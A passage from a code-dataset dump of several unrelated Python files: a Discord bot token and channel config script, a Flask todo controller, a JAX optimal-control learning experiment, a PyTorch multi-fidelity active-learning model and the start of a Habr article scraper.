CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'PUBGapi':\n line[1] = ID\n \n with open(tokenFilepath, 'w') as wCONFIG:\n CONFIGwriter = 
csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n\ndef setDiscordToken():\n \n ID = input('Please enter the developer API TOKEN for the Discord bot: ')\n with open(tokenFilepath, 'r') as CONFIG:\n CONFIGreader = csv.reader(CONFIG)\n lists = list(CONFIGreader)\n for line in lists:\n if line[0] == 'discordPUBGbot':\n line[1] = ID\n \n with open(tokenFilepath, 'w') as wCONFIG:\n CONFIGwriter = csv.writer(wCONFIG)\n CONFIGwriter.writerows(lists)\n \ndef configChannels():\n\n setRegistrationChannelID()\n setSoloChannelID()\n setDuoChannelID()\n setSquadChannelID()\n\ndef configTokens():\n\n setDiscordToken()\n setPUBGToken()\n\ndef configAll():\n\n setDiscordToken()\n setPUBGToken()\n setRegistrationChannelID()\n setSoloChannelID()\n setDuoChannelID()\n setSquadChannelID()\n\n","repo_name":"SulimanCS/pubg-reports","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2714571255","text":"from flask import Flask, render_template, url_for, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models.todo import db, Todo\n\n\ndef display_current_tasks(template):\n tasks = Todo.query.order_by(Todo.date_created).all()\n print(tasks)\n return render_template(template, tasks=tasks)\n\ndef display_task(id, template):\n task = Todo.query.get_or_404(id)\n return render_template(template, task=task)\n\ndef store(task_content):\n new_task = Todo(content=task_content)\n try:\n db.session.add(new_task)\n db.session.commit()\n return True\n except:\n return False\n\ndef delete_task(id):\n task_to_delete = Todo.query.get_or_404(id)\n try:\n db.session.delete(task_to_delete)\n db.session.commit()\n return True\n except:\n return False\n\ndef update_task(id, new_content):\n task = Todo.query.get_or_404(id)\n try:\n task.content = new_content\n db.session.commit()\n return True\n except:\n return False","repo_name":"jkolp/simple_task_manager","sub_path":"controllers/task_controller.py","file_name":"task_controller.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26946941167","text":"#!/usr/bin/env python\n\nimport jax\nimport jax.numpy as np\n\nimport gradient_gp\nimport sampling\nimport pontryagin_utils\nimport plotting_utils\nimport nn_utils\n\nimport ipdb\nimport matplotlib\nimport matplotlib.pyplot as pl\nimport tqdm\nfrom functools import partial\n\nfrom jax.config import config\n# config.update(\"jax_debug_nans\", True)\njax.config.update(\"jax_enable_x64\", True)\n\nimport numpy as onp\n\n# import matplotlib\n# import matplotlib.pyplot as pl\n# pl.rcParams['text.usetex'] = True\n#\n# matplotlib.use(\"pgf\")\n# matplotlib.rcParams.update({\n# \"pgf.texsystem\": \"pdflatex\",\n# 'font.family': 'serif',\n# 'text.usetex': True,\n# 'pgf.rcfonts': False,\n# })\n\n\n\ndef uniform_sampling_learning(problem_params, algo_params, key):\n\n if algo_params['load_last']:\n\n y0s = np.load('datasets/last_y0s.npy')\n lamTs = np.load('datasets/last_lamTs.npy')\n\n else:\n\n key, subkey = jax.random.split(key)\n y0s, lamTs = sample_uniform(problem_params, algo_params, subkey)\n\n # shuffle data to 'get rid of' interdependence\n key, subkey = jax.random.split(key)\n permuted_idx = jax.random.permutation(subkey, np.arange(y0s.shape[0]))\n\n y0s = y0s[permuted_idx, :]\n lamTs = lamTs[permuted_idx, :]\n\n # normalise all data (xs, lambdas, values)\n y0s = y0s / 
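The six setters in the Discord `config.py` record above each repeat the same read–modify–write cycle over a CSV file. A possible consolidation — the helper name is hypothetical, not part of the repo:

```python
import csv

def set_config_value(filepath, key, prompt):
    """Prompt for a value and write it into the row whose first cell is key."""
    value = input(prompt)
    with open(filepath, 'r', newline='') as f:
        rows = list(csv.reader(f))
    for row in rows:
        if row and row[0] == key:
            row[1] = value
    with open(filepath, 'w', newline='') as f:
        csv.writer(f).writerows(rows)

# e.g. set_config_value(configFilepath, 'registration',
#     'Please enter the channel ID for registering new users: ')
```

Opening with `newline=''` is the csv module's recommended mode and avoids blank rows on Windows, which the original open calls can produce.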
y0s.std(axis=0)[None, :]\n\n # partition data into init, main, eval.\n # init = data for fitting first GP and optimising GP hyperparams.\n # main = big pool to sample from when fitting GP.\n # eval = holdout set to do MC estimate of approximation error.\n init_y0s, main_y0s, eval_y0s = np.split(y0s, [128, y0s.shape[0]-256], axis=0)\n\n\n # make GP, optimise hyperparams.\n nx = problem_params['nx']\n initparams = {\n 'log_amp': np.log(12),\n 'log_scale': np.zeros(nx),\n }\n\n gp_xs, gp_ys, gp_gradflags = gradient_gp.reshape_for_gp(init_y0s)\n\n gp, opt_params, nll = gradient_gp.get_optimised_gp(\n gradient_gp.build_gp,\n initparams,\n gp_xs,\n gp_ys,\n gp_gradflags,\n plot=algo_params['gp_train_plot'],\n )\n\n print(opt_params)\n\n # opt_params = {\n # 'log_amp': np.log(12),\n # 'log_scale': np.zeros(nx) + .5,\n # }\n\n\n main_xs, main_ys, main_gradflags = gradient_gp.reshape_for_gp(main_y0s)\n eval_xs, eval_ys, eval_gradflags = gradient_gp.reshape_for_gp(eval_y0s)\n\n x0max, x1max = np.abs(main_xs).max(axis=0)\n xbounds = (-x0max, x0max)\n ybounds = (-x1max, x1max)\n\n N_iters = algo_params['N_learning_iters']\n\n mean_stds = onp.zeros(N_iters)\n rmses = onp.zeros(N_iters)\n\n # maaaan fuck that gp shit lets try the nn again.\n try_nn = False\n if try_nn:\n nx = problem_params['nx']\n\n V_nn = nn_utils.nn_wrapper(\n input_dim = nx,\n layer_dims = algo_params['nn_layersizes'],\n output_dim = 1,\n )\n\n key, subkey = jax.random.split(key)\n nn_params = V_nn.init_nn_params(subkey)\n\n\n batchsize = algo_params['nn_batchsize']\n N_epochs = algo_params['nn_N_epochs']\n\n # make a test set or not.\n testset_fraction = algo_params['nn_testset_fraction']\n\n nn_xs, nn_ys = np.split(main_y0s, [nx], axis=1)\n\n # normalise. just to experiment. todo, later un-normalise for inference.\n # nn_xs = nn_xs / nn_xs.std(axis=0)[None, :]\n # nn_ys = nn_ys / nn_ys.std(axis=0)[None, :]\n\n nn_params, outputs = V_nn.train(\n nn_xs, nn_ys, nn_params, algo_params, key\n )\n\n plotting_utils.plot_nn_train_outputs(outputs)\n\n pl.figure()\n extent=5\n plotting_utils.plot_fct(partial(V_nn.nn.apply, nn_params),\n (-extent, extent), (-extent, extent), N_disc=256)\n\n plotting_utils.plot_fct_3d(partial(V_nn.nn.apply, nn_params),\n (-extent, extent), (-extent, extent), N_disc=256)\n\n # this is all still the normalised data.\n nplot = 100\n pl.gca().scatter(nn_xs[0:nplot, 0], nn_xs[0:nplot, 1], nn_ys[0:nplot, 2])\n\n\n pl.show()\n ipdb.set_trace()\n\n\n # add this many data points per iteration\n batch_size = 32\n\n for i in range(N_iters):\n # just add one more sample to the GP.\n # None to match shapes\n\n # easier to make this new every time\n y0s = np.concatenate([init_y0s, main_y0s[0:i*batch_size, :]], axis=0)\n gp_xs, gp_ys, gp_gradflags = gradient_gp.reshape_for_gp(y0s)\n\n # only fit V, not costate - this is dumb, but just to see whether this improves problems\n # gp_xs = gp_xs[gp_gradflags == 0]\n # gp_ys = gp_ys[gp_gradflags == 0]\n # gp_gradflags = gp_gradflags[gp_gradflags == 0]\n\n gp = gradient_gp.build_gp(opt_params, gp_xs, gp_gradflags)\n\n npts = y0s.shape[0]\n name = f'figs/gp_{npts:04d}_pts.png'\n # name = f'figs/gp_iter_{i:04d}.png'\n\n plotting_utils.plot_2d_gp(gp, gp_ys, xbounds, ybounds, save=True, savename=name)\n pl.clf(); pl.close()\n print(f'saved figure \"{name}\" hopefully')\n\n\n\n # pred_gp = trained_gp.condition(ys, (X_pred, pred_grad_flag)).gp\n # y_pred = pred_gp.loc\n # y_std = np.sqrt(pred_gp.variance)\n\n\n\n\n\n\n\n\ndef sample_uniform(problem_params, algo_params, key):\n\n # so 
nice, exactly from paper\n Q_S = algo_params['x_Q_S']\n nx = problem_params['nx']\n\n # reward_fct = lambda x: -50 * np.maximum(0, x.T @ Q_S @ x - 1) + 5 * np.sqrt(0.01 + x.T @ np.array([[1,0],[0,0]]) @ x)\n # reward_fct = lambda x: -100 * np.maximum(0, x.T @ Q_S @ x - 1) + 10 * np.sqrt(0.01 + np.square(np.array([3, 1]) @ x))\n reward_fct = lambda x: -10 * np.maximum(0, x.T @ Q_S @ x - 1)\n reward_fct = lambda y: -10 * np.maximum(0, y[0:nx].T @ Q_S @ y[0:nx] - 1) # S = some ellipse\n\n Vmax = 10\n reward_fct = lambda y: -10 * np.maximum(0, y[-1] - Vmax) # S = value sublevel set\n\n integrate = pontryagin_utils.make_pontryagin_solver_wrapped(problem_params, algo_params)\n\n y0s, λTs = sampling.geometric_mala_2(integrate, reward_fct, problem_params, algo_params, key)\n\n return y0s, λTs\n\n\n\nif __name__ == '__main__':\n\n # simple control system. double integrator with friction term.\n def f(t, x, u):\n # p' = v\n # v' = f\n # f = -v**3 + u\n # clip so we don't have finite escape time when integrating backwards\n v_cubed = np.clip((np.array([[0, 1]]) @ x)**3, -10, 10)\n return np.array([[0, 1], [0, 0]]) @ x + np.array([[0, 1]]).T @ (u - v_cubed)\n\n def l(t, x, u):\n Q = np.eye(2)\n R = np.eye(1)\n return x.T @ Q @ x + u.T @ R @ u\n\n def h(x):\n Qf = 1 * np.eye(2)\n return (x.T @ Qf @ x).reshape()\n\n\n problem_params = {\n 'f': f,\n 'l': l,\n 'h': h,\n 'T': 8,\n 'nx': 2,\n 'nu': 1,\n 'terminal_constraint': True, # not tested with False for a long time\n }\n\n x_sample_scale = np.diag(np.array([1, 3]))\n x_sample_cov = x_sample_scale @ x_sample_scale.T\n\n # algo params copied from first resampling characteristics solvers\n # -> so some of them might not be relevant\n algo_params = {\n 'pontryagin_solver_dt': 1/16,\n\n # 'pontryagin_sampler_n_trajectories': 32,\n # 'pontryagin_sampler_n_iters': 8,\n # 'pontryagin_sampler_n_extrarounds': 2,\n # 'pontryagin_sampler_strategy': 'importance',\n # 'pontryagin_sampler_deterministic': False,\n # 'pontryagin_sampler_plot': False, # plotting takes like 1000x longer than the computation\n # 'pontryagin_sampler_returns': 'functions',\n\n 'sampler_dt': 1/128,\n 'sampler_burn_in': 0,\n 'sampler_N_chains': 4, # with pmap this has to be 4\n 'samper_samples_per_chain': 2**13, # actual samples = N_chains * samples\n 'sampler_steps_per_sample': 1,\n 'sampler_plot': True,\n 'sampler_tqdm': True,\n\n 'x_sample_cov': x_sample_cov,\n 'x_max_mahalanobis_dist': 2,\n\n 'gp_iters': 100,\n 'gp_train_plot': True,\n 'N_learning_iters': 200,\n\n 'load_last': True,\n\n 'nn_layersizes': [64, 64, 64, 64],\n 'nn_V_gradient_penalty': 2,\n 'nn_batchsize': 128,\n 'nn_N_epochs': 10,\n 'nn_progressbar': True,\n 'nn_testset_fraction': 0.1,\n 'lr_staircase': False,\n 'lr_staircase_steps': 4,\n 'lr_init': 0.01,\n 'lr_final': 0.00005,\n }\n\n # the matrix used to define the relevant state space subset in the paper\n # sqrt(x.T @ Σ_inv @ x) - max_dist\n # = max_dist * sqrt((x.T @ Σ_inv/max_dist**2 @ x) - 1)\n # so we can set Q_S = Σ_inv/max_dist and just get a different scaling factor\n algo_params['x_Q_S'] = np.linalg.inv(x_sample_cov) / algo_params['x_max_mahalanobis_dist']**2\n\n # problem_params are parameters of the problem itself\n # algo_params contains the 'implementation details'\n\n uniform_sampling_learning(problem_params, algo_params, 
key=jax.random.PRNGKey(0))\n","repo_name":"mbjd/approximate_optimal_control","sub_path":"main_gp.py","file_name":"main_gp.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23447186603","text":"import numpy as np\nimport torch\nimport torch.distributions as distributions\nfrom torch.optim import Adam\nfrom torch.optim import LBFGS\n# from tqdm.notebook import tqdm\n\nimport time\n\nfrom config import opt\nimport model.Utils as utils\n\n# import data.dataset_active as dataset\nfrom model.BaseNet import AdaptiveBaseNet\n\nfrom infrastructure.misc import *\n\n\nclass BaldAL:\n \n def __init__(self, opt, synD):\n \n self.data = synD\n \n self.logger = opt.logger\n self.verbose = opt.verbose\n \n self.M = opt.M\n self.input_dims = opt.input_dim_list\n self.output_dims = opt.output_dim_list\n self.base_dims = opt.base_dim_list\n self.hlayers = opt.hlayers_list\n\n self.device = torch.device(opt.placement)\n self.torch_type = opt.torch_type\n \n self.max_epochs = opt.max_epochs\n self.print_freq = opt.print_freq\n self.activation = opt.activation\n self.opt_lr = opt.opt_lr\n \n self.nns_list, self.nns_params_list, self.log_tau_list = self.init_model_params()\n \n self.reg_strength = opt.reg_strength\n self.learning_rate = opt.learning_rate\n \n self.Nquery = opt.Nquery\n \n\n \n \n \n \n def init_model_params(self,):\n nns_list = []\n nns_params_list = []\n log_tau_list = []\n \n for m in range(self.M):\n if m == 0:\n in_dim = self.input_dims[m]\n else:\n in_dim = self.input_dims[m] + self.base_dims[m-1]\n #\n layers = [in_dim] + self.hlayers[m] + [self.base_dims[m]] + [self.output_dims[m]]\n print(layers)\n nn = AdaptiveBaseNet(layers, self.activation, device=self.device, torch_type=self.torch_type)\n nn_params = nn.parameters()\n log_tau = torch.tensor(0.0, device=self.device, requires_grad=True, dtype=self.torch_type)\n \n nns_list.append(nn)\n nns_params_list.append(nn_params)\n log_tau_list.append(log_tau)\n #\n \n return nns_list, nns_params_list, log_tau_list\n \n def forward(self, X, m, sample=False):\n # first fidelity\n Y_m, base_m = self.nns_list[0].forward(X, sample)\n \n # propagate to the other fidelity levels\n for i in range(1,m+1):\n X_concat = torch.cat((base_m, X), dim=1)\n # print(X_concat.shape)\n Y_m, base_m = self.nns_list[i].forward(X_concat, sample)\n #\n \n return Y_m, base_m\n\n \n def eval_llh(self, X, Y, m):\n Ns = 5\n llh_samples_list = []\n \n # dist_noise = distributions.normal.Normal(loc=0.0, scale=1/torch.exp(self.log_tau_list[m]))\n \n for ns in range(Ns):\n pred_sample, _ = self.forward(X, m, sample=True)\n \n # log_prob_verify = torch.sum(dist_noise.log_prob(Y-pred_sample))\n # print(log_prob_verify)\n \n log_prob_sample = torch.sum(-0.5*torch.square(torch.exp(self.log_tau_list[m]))*torch.square(pred_sample-Y) +\\\n self.log_tau_list[m] - 0.5*np.log(2*np.pi))\n \n # print(log_prob_sample)\n \n llh_samples_list.append(log_prob_sample)\n #\n \n return sum(llh_samples_list)\n\n def batch_eval_llh(self, X_list, Y_list):\n llh_list = []\n for m in range(self.M):\n llh_m = self.eval_llh(X_list[m], Y_list[m], m)\n llh_list.append(llh_m)\n #\n return sum(llh_list)\n \n def batch_eval_kld(self,):\n kld_list = []\n for m in range(self.M):\n kld_list.append(self.nns_list[m]._eval_kld())\n #\n return sum(kld_list)\n \n def batch_eval_reg(self,):\n reg_list = []\n for m in range(self.M):\n reg_list.append(self.nns_list[m]._eval_reg())\n #\n return sum(reg_list)\n \n def 
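`eval_llh` in the `BaldAL` record above hand-codes a Gaussian log-likelihood parameterised by `log_tau`, where `tau = exp(log_tau)` acts as a precision (the noise scale is `1/tau`): each term is `-0.5*tau^2*(pred-y)^2 + log_tau - 0.5*log(2*pi)`. A quick sanity check of that expression against `torch.distributions.Normal`, matching the commented-out `dist_noise` the author left in place:

```python
import numpy as np
import torch
import torch.distributions as distributions

log_tau = torch.tensor(0.3)
y, pred = torch.randn(5), torch.randn(5)

manual = (-0.5 * torch.square(torch.exp(log_tau)) * torch.square(pred - y)
          + log_tau - 0.5 * np.log(2 * np.pi))
ref = distributions.Normal(loc=pred, scale=1 / torch.exp(log_tau)).log_prob(y)
assert torch.allclose(manual, ref, atol=1e-6)
```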
eval_rmse_loss(self, X, Y, m):\n pred, _ = self.forward(X, m, sample=False)\n rmse = torch.sqrt(torch.mean(torch.square(Y - pred)))\n return rmse\n \n def batch_eval_rmse(self, X_list, Y_list):\n rmse_list = []\n for m in range(self.M):\n rmse = self.eval_rmse_loss(X_list[m], Y_list[m], m)\n rmse_list.append(rmse)\n #\n return rmse_list\n \n def eval_mae_loss(self, X, Y, m):\n pred, _ = self.forward(X, m, sample=False)\n mae = torch.mean(torch.abs(Y - pred))\n return mae\n \n def batch_eval_mae(self, X_list, Y_list):\n mae_list = []\n for m in range(self.M):\n mae = self.eval_mae_loss(X_list[m], Y_list[m], m)\n mae_list.append(mae)\n #\n return mae_list\n\n def init_train_optimizer(self, lr, weight_decay):\n opt_params = []\n \n for m in range(self.M):\n \n for nn_param_name, nn_param in self.nns_params_list[m].items():\n # print(nn_param_name)\n opt_params.append({'params':nn_param, 'lr':lr})\n #\n opt_params.append({'params':self.log_tau_list[m], 'lr':lr})\n \n #\n \n return Adam(opt_params, lr=lr, weight_decay=weight_decay)\n \n def eval_rmse(self, m, N_X, N_Y, train=True):\n # inputs are normalized\n N_pred, _ = self.forward(N_X, m, sample=False)\n scales = self.data.get_scales(m, train)\n \n Y = N_Y*scales['y_std'] + scales['y_mean']\n pred = N_pred*scales['y_std'] + scales['y_mean']\n \n rmse = torch.sqrt(torch.mean(torch.square(Y-pred)))\n n_rmse = rmse/scales['y_std']\n \n return rmse.data.cpu().numpy(), n_rmse.data.cpu().numpy()\n \n def eval_rmse_ground(self, m, N_X, np_y_ground, train=True):\n # inputs are normalized\n N_pred, _ = self.forward(N_X, m, sample=False)\n scales = self.data.get_scales(m, train)\n \n mu = np.mean(np_y_ground)\n sig = np.std(np_y_ground)\n\n# np_N_y_ground = (np_y_ground - np.mean(np_y_ground))/np.std(np_y_ground)\n\n np_N_pred = N_pred.data.cpu().numpy()\n interp_np_N_pred = self.data.interp_to_ground(np_N_pred, m)\n \n interp_np_pred = interp_np_N_pred*sig + mu\n \n rmse = np.sqrt(np.mean(np.square(np_y_ground-interp_np_pred)))\n n_rmse = rmse/sig\n \n return rmse, n_rmse\n\n def train(self,):\n \n if self.verbose:\n print('train the model ...')\n \n X_train_list = []\n y_train_list = []\n np_y_train_ground_list = []\n \n X_test_list = []\n y_test_list = []\n np_y_test_ground_list = []\n \n for m in range(self.M):\n \n np_X_train, np_y_train, np_y_train_ground = self.data.get_data(m,train=True, normalize=True, noise=0.01)\n np_X_test, np_y_test, np_y_test_ground = self.data.get_data(m,train=False, normalize=True, noise=0.00)\n \n X_train_list.append(torch.tensor(np_X_train, device=self.device, dtype=self.torch_type))\n y_train_list.append(torch.tensor(np_y_train, device=self.device, dtype=self.torch_type))\n np_y_train_ground_list.append(np_y_train_ground)\n \n X_test_list.append(torch.tensor(np_X_test, device=self.device, dtype=self.torch_type))\n y_test_list.append(torch.tensor(np_y_test, device=self.device, dtype=self.torch_type))\n np_y_test_ground_list.append(np_y_test_ground)\n \n #\n \n hist_test_rmse = []\n hist_test_ground_rmse = []\n \n optimizer_train = self.init_train_optimizer(self.learning_rate, 0.0)\n \n start_time = time.time()\n \n for epoch in range(self.max_epochs+1):\n\n optimizer_train.zero_grad()\n loss = -self.batch_eval_llh(X_train_list, y_train_list) + self.batch_eval_kld() + self.reg_strength*self.batch_eval_reg()\n loss.backward(retain_graph=True)\n optimizer_train.step()\n \n if epoch % self.print_freq == 0:\n \n if self.verbose:\n print('======================================')\n print('%d-th epoch: loss=%.7f' % (epoch, 
loss))\n print('======================================')\n self.logger.write('=============================================================\\n')\n self.logger.write(str(epoch) + '-th epoch: loss=' + str(loss.data.cpu().numpy()) +\\\n ', time_elapsed:' + str(time.time()-start_time) + '\\n')\n self.logger.write('=============================================================\\n')\n \n buff_test_nRmse = []\n buff_test_nRmse_ground = []\n\n for m in range(self.M):\n\n train_rmse, n_train_rmse = self.eval_rmse(m, X_train_list[m], y_train_list[m], train=True)\n test_rmse, n_test_rmse = self.eval_rmse(m, X_test_list[m], y_test_list[m], train=False)\n \n train_ground_rmse, n_train_ground_rmse = self.eval_rmse_ground(\n m, X_train_list[m], np_y_train_ground_list[m], train=True)\n test_ground_rmse, n_test_ground_rmse = self.eval_rmse_ground(\n m, X_test_list[m], np_y_test_ground_list[m], train=False)\n \n buff_test_nRmse.append(n_test_rmse)\n buff_test_nRmse_ground.append(n_test_ground_rmse)\n \n if self.verbose:\n print(' m=%d:' % (m))\n print(' * (origin) train_rmse=%.7f, test_rmse=%.7f' % (n_train_rmse, n_test_rmse))\n print(' * (ground) train_rmse=%.7f, test_rmse=%.7f' % (n_train_ground_rmse, n_test_ground_rmse))\n# print(' * (ground) train_rmse=%.7f, test_rmse=%.7f' % (train_ground_rmse, test_ground_rmse))\n # if verbose\n self.logger.write('m='+str(m)+'\\n')\n self.logger.write(' * (origin) train_rmse='+str(n_train_rmse)+', test_rmse='+str(n_test_rmse)+'\\n')\n self.logger.write(' * (ground) train_rmse='+str(n_train_ground_rmse)+',test_rmse='+str(n_test_ground_rmse)+'\\n')\n self.logger.write(' * log_tau_m='+str(self.log_tau_list[m].data.cpu().numpy())+'\\n')\n # for m\n \n hist_test_rmse.append(np.array(buff_test_nRmse))\n hist_test_ground_rmse.append(np.array(buff_test_nRmse_ground))\n \n # if epoch\n self.logger.flush()\n # for epoch\n \n N_pred, _ = self.forward(X_test_list[-1], self.M-1, sample=False)\n \n res = {}\n res['test_rmse'] = np.array(hist_test_rmse)\n res['test_ground_rmse'] = np.array(hist_test_ground_rmse)\n res['N_predict'] = N_pred.data.cpu().numpy()\n\n return res\n\n def nonlinear_marginal_base(self, X, m, Wcat_list):\n # first fidelity\n W = Wcat_list[0][0:-1, :]\n b = Wcat_list[0][-1, :].reshape([1,-1])\n #print(W.shape)\n #print(b.shape)\n base_m = self.nns_list[0].forward_base_by_sample(X, W, b)\n \n # propagate to the other fidelity levels\n for i in range(1,m+1):\n W = Wcat_list[i][0:-1, :]\n b = Wcat_list[i][-1, :].reshape([1,-1])\n #print(W.shape)\n #print(b.shape)\n\n X_concat = torch.cat((base_m, X), dim=1)\n base_m = self.nns_list[i].forward_base_by_sample(X_concat, W, b)\n #\n return base_m\n\n def eval_marginal_base_variance(self, Xq, m):\n # pull out the variables required for approximation\n pred_samples_list = []\n Ns = 10\n for ns in range(Ns):\n pred, base = self.forward(Xq, m, sample=True)\n pred_samples_list.append(base)\n #\n \n pred_samples = torch.stack(pred_samples_list)\n pred_samples = torch.reshape(pred_samples, [Ns, -1, 1])\n \n mu = torch.mean(pred_samples, dim=0)\n \n diff = pred_samples - mu\n \n diff_tr = diff.permute(0,2,1)\n \n V_base = torch.sum(torch.einsum('bij,bjk->bik', diff, diff_tr), dim=0)/(Ns-1)\n \n return V_base\n\n def eval_marginal_entropy(self, Xq, m):\n \n V_base = self.eval_marginal_base_variance(Xq, m)\n A = self.nns_list[m].A\n \n N = Xq.shape[0]\n \n K = self.base_dims[m]\n D = self.output_dims[m]\n \n I_N = torch.eye(N, device=self.device, dtype=self.torch_type)\n \n A_Atr = torch.matmul(A, A.T)\n \n kron_A_Atr_I_N = 
utils.Kronecker(A_Atr, I_N)\n \n # print(V_base.shape)\n # print(kron_A_Atr_I_N.shape)\n \n I_KN = torch.eye(K*N, device=self.device, dtype=self.torch_type)\n \n log_tau = self.log_tau_list[m]\n \n# sign, log_abs_det = torch.slogdet(torch.exp(log_tau)*torch.matmul(kron_A_Atr_I_N, V_base) + I_KN)\n# log_det = torch.log(sign*torch.exp(log_abs_det))\n\n log_det = torch.logdet(torch.exp(log_tau)*torch.matmul(kron_A_Atr_I_N, V_base) + I_KN)\n \n entropy = D*N*(np.log(2*np.pi*np.e)-log_tau) + log_det\n\n return entropy\n \n \n def eval_query_mutual_info(self, Xquery, m):\n \n H_m = self.eval_marginal_entropy(Xquery, m)\n return H_m\n\n def init_query_points(self, Nq, m):\n lb, ub = self.data.get_N_bounds(m)\n scale = (ub-lb).reshape([1,-1])\n uni_noise = np.random.uniform(size=[Nq, self.input_dims[m]])\n \n np_Xq_init = uni_noise*scale + lb\n \n Xq = torch.tensor(np_Xq_init, device=self.device, dtype=self.torch_type, requires_grad=True)\n \n return Xq\n\n\n def eval_query(self, m):\n \n # sometimes the log det will throw numerical erros, if that happens, re-try\n\n mutual_info = None\n Xq = None\n \n max_retry = 10\n count = 0\n success = False\n\n while not success:\n\n if count <= max_retry:\n try:\n\n Xq = self.init_query_points(self.Nquery, m)\n\n np_lb, np_ub = self.data.get_N_bounds(m)\n bounds = torch.tensor(np.vstack((np_lb, np_ub)), device=self.device, dtype=self.torch_type)\n\n optimizer_query = LBFGS([Xq], self.opt_lr)\n\n mutual_info = self.eval_query_mutual_info(Xq, m)\n if self.verbose:\n print('Query m=%d info BEFORE Opt'%(m))\n print(' - info: ', mutual_info.data.cpu().numpy())\n print(' - query: ', Xq.data.cpu().numpy())\n \n self.logger.write(\"start to query fidelity m=\" + str(m) + '\\n')\n self.logger.write(\" - info BEFORE \" + str(mutual_info.data.cpu().numpy()) + '\\n')\n self.logger.write(\" - Xq BEFORE \" + str(Xq.data.cpu().numpy()) + '\\n')\n\n def closure():\n optimizer_query.zero_grad() \n loss = -self.eval_query_mutual_info(Xq, m)\n loss.backward(retain_graph=True)\n\n with torch.no_grad():\n for j, (lb, ub) in enumerate(zip(*bounds)):\n Xq.data[..., j].clamp_(lb, ub) # need to do this on the data not X itself\n #\n #\n return loss\n\n optimizer_query.step(closure)\n\n mutual_info = self.eval_query_mutual_info(Xq, m)\n if self.verbose:\n print('Query m=%d info AFTER Opt'%(m))\n print(' - info: ', mutual_info.data.cpu().numpy())\n print(' - query: ', Xq.data.cpu().numpy())\n \n self.logger.write(\" - info AFTER \" + str(mutual_info.data.cpu().numpy()) + '\\n')\n self.logger.write(\" - Xq AFTER \" + str(Xq.data.cpu().numpy()) + '\\n')\n \n\n if mutual_info < 0:\n if self.verbose:\n print('MI < 0, give another try... count', count)\n self.logger.write('MI < 0, give another try... count ' + str(count) + '\\n')\n self.logger.flush()\n success=False\n count += 1\n else:\n success=True\n #\n except:\n if self.verbose:\n print('Opt fails, give another try... count', count)\n self.logger.write('Opt fails, give another try... 
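`eval_marginal_entropy` above evaluates `H = D*N*(log(2*pi*e) - log_tau) + log det(tau * (A Aᵀ ⊗ I_N) V_base + I_KN)`, the entropy of the marginal output distribution given the sampled base covariance. Assuming `utils.Kronecker` agrees with `torch.kron` and that `A` has shape `(K, D)` so `A @ A.T` is `(K, K)` — both assumptions, since neither helper nor `AdaptiveBaseNet.A` is defined in this record — a toy-sized reproduction of the same quantity:

```python
import numpy as np
import torch

N, K, D = 4, 3, 2                      # points, base dim, output dim
log_tau = torch.tensor(0.1)
A = torch.randn(K, D)                  # so A @ A.T is (K, K)

B = torch.randn(K * N, K * N)
V_base = B @ B.T / (K * N)             # synthetic PSD base covariance (KN, KN)

kron = torch.kron(A @ A.T, torch.eye(N))                      # (KN, KN)
M = torch.exp(log_tau) * kron @ V_base + torch.eye(K * N)
entropy = D * N * (np.log(2 * np.pi * np.e) - log_tau) + torch.logdet(M)
print(float(entropy))
```

Because `kron` and `V_base` are both positive semi-definite, `M` has positive determinant and `torch.logdet` is well defined — which is presumably why the `slogdet` fallback in the record is commented out.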
count ' + str(count)+'\\n')\n self.logger.flush()\n success=False\n count += 1\n \n # try\n else:\n success=True\n Xq = self.init_query_points(self.Nquery, m)\n mutual_info = torch.tensor(0.0)\n #if\n # while\n\n return mutual_info, Xq\n \n\n# def batch_query(self, penalties):\n# mutual_info_list = []\n# query_list = []\n# for m in range(self.M):\n# mutul_info, Xq = self.eval_query(m)\n# mutual_info_list.append(mutul_info.data.cpu().numpy())\n# query_list.append(Xq.data.cpu().numpy())\n# #\n# reg_mutual_info_list = np.array(mutual_info_list)/np.array(penalties)\n \n# argm = np.argmax(reg_mutual_info_list)\n# argx = query_list[argm]\n \n# return mutual_info_list, query_list, argm, argx\n\n def single_query(self, penalties):\n mutual_info_list = []\n query_list = []\n for m in range(self.M):\n mutul_info, Xq = self.eval_query(m)\n mutual_info_list.append(mutul_info.data.cpu().numpy())\n query_list.append(Xq.data.cpu().numpy())\n #\n reg_mutual_info_list = np.array(mutual_info_list)/np.array(penalties)\n \n argm = np.argmax(reg_mutual_info_list)\n argx = query_list[argm]\n \n self.logger.write('argm='+str(argm)+'\\n')\n self.logger.write('argx='+str(argx)+'\\n')\n self.logger.flush()\n \n return argx, argm\n\n# def debug(self,):\n# print('debug mode ...')\n \n# penalties = [1,1,1]\n \n# mutual_info_list, query_list, argm, argx = self.batch_query(penalties)\n \n# print(mutual_info_list)\n# print(query_list)\n# print(argm)\n# print(argx)\n\n\n\n \n\n \n \n \n \n \n \n# Ntrain_list = [10,5,2]\n# Ntest_list = [10,5,2]\n# Domain = 'Heat_1D'\n\n# synD = dataset.Dataset(Ntrain_list, Ntest_list, Domain)\n\n# model = MFDNN(opt, synD)\n\n# model.train()\n\n# model.debug()","repo_name":"shib0li/DMFAL","sub_path":"model/BaldAL.py","file_name":"BaldAL.py","file_ext":"py","file_size_in_byte":19265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"34184055420","text":"\r\n\"\"\"\r\nИсточник habr.ru\r\nзадача обойти ленту статей (лучшее за сутки) извлеч данные\r\n\r\nзаголовок\r\nurl статьи\r\nимя автора\r\nссылка на автора\r\nсписок тегов ( имя тега и url)\r\nсписок хабов (имя и url)\r\nспроектировать sql базу данных таким образом\r\nчто-бы данные о тегах хабах и авторах были атомарны, и не дублировались в БД\r\n\"\"\"\r\n\r\nimport re\r\nfrom requests.auth import HTTPProxyAuth\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom typing import List, Dict\r\nfrom pymongo import 